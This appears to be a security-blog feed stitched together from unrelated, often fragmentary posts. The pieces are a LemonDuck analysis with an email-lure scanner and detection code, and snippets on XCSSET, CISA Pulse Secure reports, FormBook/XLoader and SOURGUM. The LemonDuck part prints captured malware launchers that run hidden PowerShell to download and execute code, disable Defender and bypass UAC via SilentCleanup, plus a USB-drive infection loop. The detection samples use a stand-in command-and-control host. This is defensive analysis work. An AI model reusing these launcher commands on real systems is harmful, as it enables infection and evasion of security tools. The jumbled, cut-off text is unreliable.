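LURE_SUBJECTS = {
    "the truth of covid-19", "covid-19 ncov special info who", "what the fcuk",
    "good bye", "farewell letter", "broken file", "this is your order?",
}
LURE_ATTACHMENT_STEM = "readme"
LURE_EXTENSIONS = (".doc", ".js", ".zip")
SCRIPT_EXTENSIONS = (".js", ".vbs")  # .vbs is an assumption, see lead-in


def _split_ext(filename: str) -> tuple[str, str]:
    """Return (stem, extension) lower-cased; the extension keeps its dot or is empty."""
    stem, dot, ext = filename.lower().rpartition(".")
    return (stem, "." + ext) if dot else (ext, "")


def attachment_findings(filename: str, payload: bytes) -> list[str]:
    """Reasons a single attachment matches the lure pattern."""
    findings = []
    stem, ext = _split_ext(filename)
    if stem == LURE_ATTACHMENT_STEM and ext in LURE_EXTENSIONS:
        findings.append(f"attachment named '{LURE_ATTACHMENT_STEM}' with {ext} extension")
    if ext in SCRIPT_EXTENSIONS:
        findings.append(f"script attachment {filename}")
    # Inspect archives by content as well as by extension, so a renamed zip is still opened.
    if ext == ".zip" or payload.startswith(b"PK\x03\x04"):
        try:
            with zipfile.ZipFile(io.BytesIO(payload)) as archive:
                for member in archive.namelist():
                    if _split_ext(member)[1] in SCRIPT_EXTENSIONS:
                        findings.append(f"archive {filename} contains script {member}")
        except zipfile.BadZipFile:
            findings.append(f"attachment {filename} is not a valid zip archive")
    return findings


def scan_message(raw: bytes) -> dict:
    """Scan a raw message. The sender is ignored on purpose: LemonDuck mails from
    the victim's own mailbox to the victim's own contacts, so it looks internal."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    subject = str(msg["Subject"] or "")
    findings = []
    if subject.strip().lower() in LURE_SUBJECTS:
        findings.append(f"known lure subject: {subject}")
    for part in msg.iter_attachments():
        filename = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        findings.extend(attachment_findings(filename, payload))
    return {"subject": subject, "sender": str(msg["From"] or ""),
            "findings": findings, "suspicious": bool(findings)}


def build_sample_message() -> bytes:
    """Constructed sample: an internal-looking mail carrying readme.zip with readme.js inside."""
    archive = io.BytesIO()
    with zipfile.ZipFile(archive, "w") as zf:
        zf.writestr("readme.js", "// placeholder body; the real lure launches PowerShell\n")
    msg = EmailMessage()
    msg["From"] = "alice@corp.example"   # a colleague's mailbox, as in the campaign
    msg["To"] = "bob@corp.example"
    msg["Subject"] = "broken file"
    msg.set_content("file is brokened, i can't open it")
    msg.add_attachment(archive.getvalue(), maintype="application", subtype="zip",
                       filename="readme.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    result = scan_message(build_sample_message())
    print(result["suspicious"], *result["findings"], sep="\n")
```

The zip is opened by signature, not just by name, so an attachment renamed to hide the archive is still inspected; and because nothing in scan_message consults the From header, the rule holds for internal mail exactly as the text recommends.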

Figure 3. Sample email

While the JavaScript is detected by many security vendors, it might be classified under generic detection names. Organizations may find it valuable to flag JavaScript or VBScript that, when executed directly from a mail download, spawns a command interpreter (such as PowerShell), for example through custom detection rules.

Since LemonDuck began operating, the .zip-to-.js file execution method has been the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of the most recent iterations of the email-delivered downloads with those from April 2020.


April 2020 PowerShell script (readme.js launcher, as captured; the excerpt is truncated):

var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c "if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString("*%username%*%computername%"+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString("*%username%*%computername%"+[Environment]::OSVersion.version.Majo
//This File is broken.

March 2021 PowerShell script (readme.js launcher, as captured):

var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'')";,0,1);
//This File is broken.
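Detection logic for the chain shown in the two scripts above, as an added example that is not part of the Microsoft post: it runs over constructed endpoint telemetry and flags the script-host-to-hidden-PowerShell download, the Defender real-time-protection switch-off, and the HKCU\Environment\windir write followed by a run of the SilentCleanup scheduled task. That last pairing is a UAC bypass, a fact about Windows rather than something the page states: SilentCleanup runs with highest privileges and its action expands %windir%, so a command stored in the per-user windir value executes elevated (the trailing "&::" in the April 2020 script comments out the rest of the task's command line). The event schema (process_create and registry_set records with the fields used below), the host names and the download URL are assumptions made for the example.

```python
# Added example, not from the Microsoft post: detection rules for the
# email-delivered LemonDuck chain, run over constructed telemetry. The event
# schema (process_create / registry_set with the fields used here), the hosts
# and the c2.invalid URL are assumptions; adapt the field names to your EDR or
# Sysmon pipeline.
from datetime import datetime, timedelta

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SHELLS = ("cmd.exe", "powershell.exe")
HIJACK_WINDOW = timedelta(minutes=5)


def normalize_cmdline(cmdline: str) -> str:
    """Undo the backtick splitting PowerShell tolerates inside tokens (IE`x,
    Ne`w-Obj`ect, Net.WebC`lient in the March 2021 script) and lower-case, so
    plain substring rules match the de-obfuscated command line."""
    return cmdline.replace("`", "").lower()


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def detect(events: list[dict]) -> list[dict]:
    """Return alerts for the LemonDuck launcher behaviours, in event order."""
    alerts = []
    windir_hijack_at = {}  # host -> time HKCU\Environment\windir was pointed at a command
    for ev in sorted(events, key=lambda e: e["ts"]):
        host = ev["host"]

        if ev["event"] == "registry_set":
            # A command stored in HKCU\Environment\windir: SilentCleanup expands %windir%
            # with highest privileges, so this is the set-up for the elevation step.
            if ev["key"].lower().endswith("\\environment") and ev["value_name"].lower() == "windir":
                data = normalize_cmdline(ev["value_data"])
                if "cmd" in data or "powershell" in data:
                    windir_hijack_at[host] = ev["ts"]
                    alerts.append({"rule": "windir_hijack", "host": host, "ts": ev["ts"],
                                   "evidence": ev["value_data"]})
            continue

        if ev["event"] != "process_create":
            continue
        image, parent = _basename(ev["image"]), _basename(ev["parent_image"])
        cmd = normalize_cmdline(ev["command_line"])

        # readme.js -> cmd /c start /b notepad ... & powershell -w hidden ...DownloadString(...)
        if (parent in SCRIPT_HOSTS and image in SHELLS and "powershell" in cmd
                and ("-w hidden" in cmd or "-windowstyle hidden" in cmd)
                and "downloadstring" in cmd):
            alerts.append({"rule": "script_host_hidden_download", "host": host, "ts": ev["ts"],
                           "evidence": ev["command_line"]})

        # Defender real-time protection switched off from the command line.
        if "set-mppreference" in cmd and "disablerealtimemonitoring" in cmd:
            alerts.append({"rule": "defender_rtp_disable", "host": host, "ts": ev["ts"],
                           "evidence": ev["command_line"]})

        # SilentCleanup triggered shortly after the windir hijack on the same host.
        if image == "schtasks.exe" and "/run" in cmd and "silentcleanup" in cmd:
            hijacked = windir_hijack_at.get(host)
            if hijacked is not None and ev["ts"] - hijacked <= HIJACK_WINDOW:
                alerts.append({"rule": "silentcleanup_uac_bypass", "host": host, "ts": ev["ts"],
                               "evidence": ev["command_line"]})
    return alerts


T0 = datetime(2021, 3, 15, 9, 12, 0)
_C2 = "http://c2.invalid/"  # constructed stand-in for the download host
SAMPLE_EVENTS = [  # constructed telemetry: one infected host (ws01) and one clean host (ws02)
    {"ts": T0, "host": "ws01", "event": "process_create",
     "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe "C:\Users\bob\Downloads\readme.js"'},
    {"ts": T0 + timedelta(seconds=1), "host": "ws01", "event": "process_create",
     "parent_image": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd /c start /b notepad C:\Users\bob\Downloads\readme.js & powershell -w hidden "
                     "IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('" + _C2 + "'+'*mail_js*bob*WS01*10')"},
    {"ts": T0 + timedelta(seconds=2), "host": "ws01", "event": "registry_set",
     "key": r"HKCU\Environment", "value_name": "windir",
     "value_data": "cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 &::"},
    {"ts": T0 + timedelta(seconds=3), "host": "ws01", "event": "process_create",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r"schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I"},
    {"ts": T0 + timedelta(seconds=4), "host": "ws01", "event": "process_create",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1"},
    {"ts": T0 + timedelta(minutes=1), "host": "ws02", "event": "process_create",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -NoProfile -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["ts"].time(), alert["host"], alert["rule"], "|", alert["evidence"][:70])
```

The backtick stripping matters more than it looks: a rule matching the literal string "New-Object Net.WebClient" misses the March 2021 launcher entirely, while the normalized form matches both years' variants. The SilentCleanup rule is kept stateful on purpose, since schtasks /run of that task is routine on its own and only becomes interesting within minutes of the windir write.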


After the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.

Other common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck’s operation.

These methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of readme.js. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.

using System; using System.IO;   // blacklist, home, inf_data, IsSupported, CreateHomeDirectory and Infect are defined elsewhere in the sample
DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
{
    if (blacklist.Contains(drive.Name)) { continue; }   // drive already on the running list of infected drives
    Console.WriteLine("Detect drive:" + drive.Name);
    if (IsSupported(drive))
    {
        if (!File.Exists(drive + home + inf_data))   // marker file in the hidden home directory signals a prior infection
        {
            Console.WriteLine("Try to infect " + drive.Name);
            if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
            {
                // success branch elided in the excerpt
            }
        }
        else
        {
            Console.WriteLine(drive.Name + " already infected!");
        }
    }
}

Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by Microsoft 365 Defender is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.

More importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.

In Part 2 of this blog series, we’ll share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.


Microsoft 365 Defender Threat Intelligence Team

The post When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure appeared first on Microsoft Security Blog.


Criminals abuse a successful chat service to host, spread, and control malware targeting their users.


In our last update on the XCSSET campaign, we described updates to some of its features targeting the latest macOS 11 (Big Sur). Since then, the campaign has added more features to its toolset, which we have continued to monitor. We have also discovered the mechanism used to steal information from various apps, a behavior that has been present since we first discussed XCSSET.


Original release date: July 21, 2021

As part of CISA’s ongoing response to Pulse Secure compromises, CISA has analyzed 13 malware samples related to exploited Pulse Secure devices. CISA encourages users and administrators to review the following 13 malware analysis reports (MARs) for threat actor techniques, tactics, and procedures (TTPs) and indicators of compromise (IOCs) and to review CISA’s Alert Exploitation of Pulse Connect Secure Vulnerabilities for more information. 


MAR-10333209-1.v1: Pulse Connect Secure
MAR-10333243-1.v1: Pulse Connect Secure
MAR-10334057-1.v1: Pulse Connect Secure
MAR-10334057-2.v1: Pulse Connect Secure
MAR-10334587-1.v1: Pulse Connect Secure
MAR-10334587-2.v1: Pulse Connect Secure
MAR-10335467-1.v1: Pulse Connect Secure
MAR-10336161-1.v1: Pulse Connect Secure
MAR-10336935-1.v1: Pulse Connect Secure
MAR-10337580-1.v1: Pulse Connect Secure
MAR-10337580-2.v1: Pulse Connect Secure
MAR-10338401-1.v1: Pulse Connect Secure
MAR-10338868-1.v1: Pulse Connect Secure


Quick Heal Security Lab has seen a sudden increase in dotnet samples which are using steganography. Initially, in…

The post FormBook Malware Returns: New Variant Uses Steganography and In-Memory Loading of multiple stages to steal data appeared first on Quick Heal Blog | Latest computer security news, tips, and advice.


We recently conducted an investigation into a malicious Android malware sample, which we believe can be attributed to the StrongPity APT group, that was posted on the Syrian e-Gov website. To the best of our knowledge, this is the first time that the group has been publicly observed using malicious Android applications as part of its attacks.

Cybercrime and Cloud Security

Organizations have expedited use of and reliance on public cloud services to run their businesses in ways that would have been hard to anticipate, even a few years ago. And for many smaller businesses without dedicated cybersecurity functions, skills or tools, public cloud services could offer a level of protection they may otherwise lack on-premises. But don’t assume basic cloud security services are a cure-all or dissuasion to bad actors.

Today there is no safe haven from ransomware. In fact, attacks are targeting data and applications in the cloud nearly as often as they are directed at on-premises resources. Read the Full Article.


From a simple keylogger to a top prevalent malware

Formbook is currently one of the most prevalent malware families. It has been active for more than five years. Check Point reported in December 2020 that Formbook affected 4% of organizations worldwide and made it onto the top-three list of the most prevalent malware.

According to AnyRun Malware Trends Tracker, Formbook occupies the 4th place in a list of the most prevalent malware families in 2020.

Figure 1 – Formbook is in 4th place among the most prevalent malware families of the past 12 months (June 2020 – June 2021) – AnyRun.

Formbook is an Info Stealer that harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files according to the orders received from Command-and-Control (C&C) servers. The code is written in C with assembly inserts and contains a number of tricks to make it harder for researchers to analyze it.

As stated by its author, Formbook was intended to be “a simple keylogger.”  However, customers immediately saw its potential as a universal tool for use in broad spam campaigns that target organizations all over the world. As this potential became a reality, the author stopped sales of the product without giving detailed explanations about the motives behind this decision.

A short time later, Formbook was reborn as XLoader, and the malware is now sold on the underground forum under a different avatar. XLoader opened up several new opportunities, the ability to run on macOS being one of the most notable. XLoader’s story is ongoing and, judging by the popularity of the malware, shows no signs of ending any time soon.

Let’s take a look at how it all began.

Formbook: unintended popularity

A post offering the earliest version of Formbook (what we could call a beta-version) for sale appeared on the underground forum on February 13, 2016.

Figure 2 – ng-Coder offering Formbook malware for sale.

Although the first sales thread appeared on February 13, 2016, Formbook samples were seen earlier as evidenced by AnyRun:

Figure 3 – First Formbook sample was seen on January 1, 2016, according to AnyRun.

Formbook’s seller hid behind the avatar “ng-Coder”.

Note: we assume ng-Coder is a male, though we have no direct evidence, and will refer to the avatar as “he” throughout this article.



ng-Coder’s forum profile, as captured:

Skype: Ng.Coder
* strong C/C++ knowledge
* strong assembly x86/x64 knowledge

ng-Coder joined the underground hack forum on October 27, 2015. According to his own statement on the forum, he was selling exploits at that time. We cannot point to ng-Coder’s exact country of origin, but judging by his phrasing, English is likely not his native language.

A day before creating the sales thread we saw above, ng-Coder requested a review of his product from an experienced member of the community.

Figure 4 – Formbook review requested by ng-Coder.

On May 9, 2016, three months after publishing the first sales thread, ng-Coder offered Formbook v0.3 for sale.

Figure 5 – Formbook v.0.3 icon.

Formbook was advertised as a product supporting multiple features:

Figure 6 – Formbook v.0.3 features.

What attracted our attention here is a strange description including the phrase “Balloon Executable” and the acronyms MPIE and MEE. These terms, which are not in use in the security community, were coined by ng-Coder to describe how Formbook operates, i.e., it uses position-independent code (shellcode) to inject the malware into a legitimate system process and initiate the shellcode execution.

Other features listed include network traffic sniffing, keylogging, clipboard monitoring, and password extraction for almost one hundred applications including browsers, messengers, FTP and email clients.

The sales pitch was a combined model, in which a customer could choose where to host the panel: on a host provided by the seller (a “Malware-as-a-Service” scheme) or on the customer’s own machine (a direct purchase). If the latter was selected, the author also provided the panel source code along with a pre-built binary.

Different types of Formbook subscriptions had different prices:

Figure 7 – The Formbook pricing as offered by ng-Coder.

ng-Coder also offered a number of different protectors to go with Formbook. For example, Net-Protector is a cross-platform crypting service priced at $100 for a Windows executable and $200 for a macOS one:

Figure 8 – Net-Protector logo.

ng-Coder was so confident in his creation that he offered to re-crypt an executable for free if it was detected by any AV in the first 30 days after the encryption:

If the crypted PE file gets flagged by AV in less than 30 days after the first crypt, we will recrypt the same crypted SHA1 for free.

Other protectors on offer included shared source code for crypters written in .NET and Delphi.

On October 6, 2017, Formbook sales abruptly stopped. The reason given was its use in spam campaigns:

Figure 9 – ng-Coder indicates that Formbook sales have ceased.

As we stated at the beginning of this article, the Formbook author didn’t want his creation to be used in email campaigns and banned all customers who did so.

On May 27, 2018, ng-Coder made his last public post on the forum where he provided a technical answer to one of the questions not related to Formbook. No further activity from him has been observed since.

As we will see, although Formbook sales were stopped, its activity was continuing. Not only could users who bought the malware to be hosted on their own servers continue to use it, but ng-Coder could make use of Formbook as well.

Used for the author’s own purposes?

We found evidence that ng-Coder might have his own plans for his creation. We analyzed the domains linked to the ng-Coder email address “ng2coder@gmail[.com” and discovered that these were used in Formbook configurations for particular campaigns labeled “private”, “list” and “zog”. We found 16 unique C&C URLs inside the Formbook malware that pointed to 13 different sub-campaigns.

All the listed domains share common features. They all were registered by the GoDaddy registrar:

Figure 10 – GoDaddy registrar appears in domains’ details.

And they all shared the same details about the person who registered them:

Figure 11 – Details for registering domains as provided by ng-Coder.

According to the LocateFamily site, “Amanda George” was living at the address provided at the time of registering the domains. However, we cannot link this person with ng-Coder avatar.

The Formbook activity didn’t just stop there. For example, in May 2020 we discovered a Formbook sample dropped by GuLoader. It was submitted to VirusTotal in June 2020:

Figure 12 – A Formbook sample dropped in May 2020 by GuLoader.

The campaign name in this sample was “private” and the main domain was registered by ng-Coder (ryandeby[.com).

XLoader: time-proven tricks re-applied in a new environment

On February 6, 2020 a new era began: the era of the Formbook successor called XLoader. On this day, XLoader was advertised for sale in one of the underground groups.

Figure 13 – XLoader as advertised in the underground group.

Formbook and XLoader share the same code base, and there are other connections between them as well, as we will see later.

Figure 14 – The seller confirms that Formbook’s code has contributed a lot to the development of XLoader.

On October 20, 2020, XLoader was offered for sale on the same forum which was used for selling Formbook.

Figure 15 – XLoader as advertised on the forum.

Note: XLoader malware for PC and Mac should not be confused with XLoader malware for Android, first discovered in 2019.

One of the most exciting things about the new malware was its ability to run on macOS. With approximately 200 million macOS users in 2018 (as reported by Apple), this is definitely a promising new market for the malware to enter.

Figure 16 – Mac sales by year, taken from

Note: Apple stopped reporting Mac sales in Q4 2018. All subsequent values are estimates.

The malware now features a more lucrative economic model for the authors as compared to Formbook. Customers can only buy the malware for a limited time and can only use a server provided by the seller; no panel source code is sold anymore. Thus, a “Malware-as-a-Service” scheme is used. Centralized C&C infrastructure allows the authors to control how the malware is used by customers.

Figure 17 – xloader announces the decision to stop selling panels and underlines the importance of controlling the customers’ actions.

The pricing table lists four options:

* Windows, executable, 1 month
* Windows, executable, 3 months
* macOS, Mach-O, 1 month
* macOS, Mach-O, 3 months

XLoader’s seller also released a free Java binder which is intended to create a standalone JAR file uniting Mach-O and exe binaries:

Figure 18 – Interface of the XBinder tool.

A new developer?

Did the new seller also take on duties as the developer and maintainer of this version of the original Formbook malware? We believe this is not the case. A new seller is just a seller, not a developer. There must be someone else behind the curtain to handle the technical part.

Figure 19 – XLoader’s seller states that he is an official seller, not a developer of the malware.

We already saw that ng-Coder wasn’t completely out of the picture, even though he no longer operated publicly. Could he be the one continuing to develop the new malware? Apart from technical similarities, we found evidence of a connection between XLoader’s seller and ng-Coder, namely a message from xloader to ng-Coder saying, “Thank you for the help”:

Figure 20 – xloader saying “thank you” to ng-Coder.

We cannot say for sure if the thanks were for a one-time helping hand or if it was for continuous support.

Another piece of evidence that points at ng-Coder’s continued participation is the statement by XLoader’s seller (posted on December 14, 2020) where he shared his hope that ng-Coder could create a newer cross-platform crypting service:

Figure 21 – xloader sharing the hope about a new crypting service from ng-Coder.


We recap the malware activity timeline and its milestones in the diagram below.

Figure 22 – The activity timeline of both malware versions.


During the lifecycle of Formbook/XLoader malware, a number of impersonators and re-sellers claimed they were the official contacts.

It began 5 years ago when ng-Coder raised a warning not to send a payment to him or anyone impersonating him for the exploit, as he stopped selling exploits in 2016. Note that there were impersonators even before Formbook was first available for sale.

In 2021, the situation hasn’t changed much. For example, there is a site freely accessible from the Internet which offers XLoader for sale, but for a higher price than the malware is sold for in the Darknet:

Figure 23 – A site in the Internet offering XLoader for sale.

The biggest difference is in the 3 months package for macOS, which is $40 higher than the Darknet price.

Another site offers XLoader for $120:

Figure 24 – Another Internet site offering XLoader for sale.

Prevalence: countries and campaigns

During the 6 months between December 1, 2020 and June 1, 2021, we saw Formbook/XLoader requests from as many as 69 countries, which is more than a third of the total 195 countries recognized in the world today.

The breakdown of victims by country is presented in the diagram below:

Figure 25 – Formbook requests by countries between December 1, 2020 and June 1, 2021.

Victims in the United States constitute more than half of the victims worldwide.

As we stated previously, according to AnyRun, Formbook is in 4th place among the most prevalent malware families of the last year and in 6th place for all time. This implies that there should be quite a lot of Formbook/XLoader campaigns in the wild. Indeed, we observed more than 1400 different campaigns of the malware during several years of monitoring its activity.

In the upcoming articles we will share the technical details of the malware’s macOS version, which reveal how XLoader operates under the hood and help us understand how the Formbook/XLoader family secured its place in malware prevalence rankings.

We also describe a distinctive feature of the XLoader malware which helps it to fool sandboxes and researchers and keep its real C&C servers hidden. Out of almost 90,000 domains used in network communication by the malware, only 1,300 are real C&C servers, which is just 1.5% of the total. The other 88,000 domains belong to legitimate sites; however, the malware sends malicious traffic to them as well. This presents security vendors with the dilemma of how to determine which are the real C&C servers without falsely identifying legitimate sites as malicious.

We also share our methods to correctly analyze the XLoader’s communication with the servers and to identify the real C&C – only one out of all the 64 domains present in any chosen sample.

Stay tuned!

Check Point Protections

As a part of the Check Point SandBlast Zero-Day Protection solution, SandBlast Network prevents these attacks. This innovative zero-day threat sandboxing capability within the SandBlast solution delivers the best possible catch rate for these threats.

SandBlast Network Protections:

Threat Emulation protections:

References

* Check Point Press Release, December 2020
* AnyRun Malware Trends Tracker
* Malware Analysis Spotlight: Formbook (September 2020)
* Significant FormBook Distribution Campaigns Impacting the U.S. and South Korea
* Formbook Research Hints Large Data Theft Attack Brewing
* Selling FormBook
* Cybercrime, new Formbook malspam campaign against hotels
* VB 2018: Inside Formbook Infostealer
* GuLoader? No, CloudEyE
* Yes, Cyber Adversaries are still using Formbook in 2021

The post Top prevalent malware with a thousand campaigns migrates to macOS appeared first on Check Point Research.

Itai Tevet, CEO of Intezer, shares the company’s vision for a simplified, consolidated malware analysis experience.

Since its inception, Intezer has strived to be an innovator in malware analysis. We introduced a new way to analyze malware through genetic code sequencing: identifying code reuse to pinpoint the origins of potential threats rather than running them in a sandbox just to get vague behavioral info.

We continue to garner accolades for this approach and are now proud to serve some of the world’s largest brands, in addition to being a frequent contributor to the security community.

Naturally, many changes have taken place in infosec over time. Cyber awareness has increased and threats have evolved. We felt it was time for another breakthrough in the way security teams conduct malware analysis in order to stay current with modern IR/SOC challenges. Working with a variety of security teams we have learned a few things along the way.

1. Malware analysis is not just about file sandboxing. About 80% of malware-related alerts do not point to a specific file but rather a suspicious endpoint activity. Security teams are looking to analyze many different artifacts, including memory dumps, URLs, disk images, procdumps and live machines. From in-house scripts and sandboxes, to unpacking and static analysis engines, they currently must leverage a number of tools just to accomplish a single investigation.

2. TMI. Simplicity is key. Teams are discouraged by tools that provide information only experienced reverse engineers can understand. As a result, incidents are being escalated from lower tiers too quickly because of the skills gap that exists. Security teams are looking to lower this barrier for conducting malware analysis.

3. Context is lacking. Sandboxes produce vague results that lack the context needed to answer necessary questions. “Trojan.Generic” or threat score 41 out of 100 sound familiar?

Taking this into account, we have reimagined what a modern malware analysis experience should look like:

1. Consolidated: Cover every possible malware incident. Scan artifacts from any malware-related incident (all file types, disk and memory images, and URLs) using all necessary analysis techniques (genetic code analysis, sandboxing, static analysis, unpacking, memory analysis) under one platform.

2. Simplified: Suitable for all skill levels, with no vague responses and a simple bottom line. Answer critical investigation questions: Is it a false positive? What is the malware family? What does it do? How should I respond?

3. Built for automation: There are more integrations among security products than ever before. This should extend to malware analysis and DFIR. A modern malware analysis platform should provide easy ways to automate IR workflows with tools like SOAR, EDR and Volatility.

Today, I’m proud to announce major new capabilities that will help Intezer Analyze users make this vision a reality. An all-in-one malware analysis experience with an emphasis on simplicity and consolidation of tools under one platform.

Some of our new capabilities include:

* Support for analyzing non-binary formats (e.g., Microsoft Office documents and PDF files)

* Sandboxing capabilities and behavior analysis

* Automatic extraction of Indicators of Compromise (IoCs)

* Mapping capabilities to the MITRE ATT&CK® matrix using static code analysis

* Improved UI and simplified reports

* Plus much more coming on our roadmap soon, including URL scanning and analyzing phishing emails

See it live or register for our upcoming webcast where we will show you how to leverage the platform to deal with attacks like CobaltStrike and Sofacy.

I invite security teams of all sizes and skill levels to try this new malware analysis experience. Sign up for free at


The post Reimagining the Malware Analysis Experience appeared first on Intezer.


The FortiGuard Labs team recently discovered a new phishing campaign with a fresh malware delivered by a Word document which is designed to steal crypto wallet information and credentials from victims’ infected devices. Learn more in our analysis.


We discovered a new malware that targets online gambling companies in China via a watering hole attack, in which visitors are tricked into downloading a malware loader disguised as a legitimate installer for well-known apps such as Adobe Flash Player or Microsoft Silverlight.


The Trend Micro research paper, “2020 Report on Threats Affecting ICS Endpoints,” presents findings on ICS endpoints and the threats that plague them. From these findings, we rounded up the list of the top ten countries with the most malware and grayware detections.

The Microsoft Threat Intelligence Center (MSTIC) alongside the Microsoft Security Response Center (MSRC) has uncovered a private-sector offensive actor, or PSOA, that we are calling SOURGUM in possession of now-patched, Windows 0-day exploits (CVE-2021-31979 and CVE-2021-33771).

Private-sector offensive actors are private companies that manufacture and sell cyberweapons in hacking-as-a-service packages, often to government agencies around the world, to hack into their targets’ computers, phones, network infrastructure, and other devices. With these hacking packages, the government agencies usually choose the targets and run the actual operations themselves. The tools, tactics, and procedures used by these companies only add to the complexity, scale, and sophistication of attacks. We take these threats seriously and have moved swiftly alongside our partners to build in the latest protections for our customers.

MSTIC believes SOURGUM is an Israel-based private-sector offensive actor. We would like to thank the Citizen Lab, at the University of Toronto’s Munk School, for sharing the sample of malware that initiated this work and their collaboration during the investigation. In their blog, Citizen Lab asserts with high confidence that SOURGUM is an Israeli company commonly known as Candiru. Third-party reports indicate Candiru produces “hacking tools [that] are used to break into computers and servers”.  

As we shared in the Microsoft on the Issues blog, Microsoft and Citizen Lab have worked together to disable the malware being used by SOURGUM that targeted more than 100 victims around the world including politicians, human rights activists, journalists, academics, embassy workers, and political dissidents. To limit these attacks, Microsoft has created and built protections into our products against this unique malware, which we are calling DevilsTongue. We have shared these protections with the security community so that we can collectively address and mitigate this threat. We have also issued a software update that will protect Windows customers from the associated exploits that the actor used to help deliver its highly sophisticated malware.

SOURGUM victimology

Media reports (1, 2, 3) indicate that PSOAs often sell Windows exploits and malware in hacking-as-a-service packages to government agencies. Agencies in Uzbekistan, United Arab Emirates, and Saudi Arabia are among the list of Candiru’s alleged previous customers. These agencies, then, likely choose whom to target and run the cyberoperations themselves.

Microsoft has identified over 100 victims of SOURGUM’s malware, and these victims are as geographically diverse as would be expected when varied government agencies are believed to be selecting the targets. Approximately half of the victims were found in the Palestinian Authority, with most of the remaining victims located in Israel, Iran, Lebanon, Yemen, Spain (Catalonia), the United Kingdom, Turkey, Armenia, and Singapore. To be clear, the identification of victims of the malware in a country doesn’t necessarily mean that an agency in that country is a SOURGUM customer, as international targeting is common.

Any Microsoft 365 Defender and Microsoft Defender for Endpoint alerts whose detection names contain DevilsTongue are signs of compromise by SOURGUM’s malware. We have included a comprehensive list of detection names below for customers to perform additional hunting in their environments.


SOURGUM appears to use a chain of browser and Windows exploits, including 0-days, to install malware on victim boxes. Browser exploits appear to be served via single-use URLs sent to targets on messaging applications such as WhatsApp.

During the investigation, Microsoft discovered two Windows 0-day exploits for vulnerabilities tracked as CVE-2021-31979 and CVE-2021-33771, both of which have been fixed in the July 2021 security updates. These vulnerabilities allow privilege escalation, giving an attacker the ability to escape browser sandboxes and gain kernel code execution. If customers have taken the July 2021 security update, they are protected from these exploits.

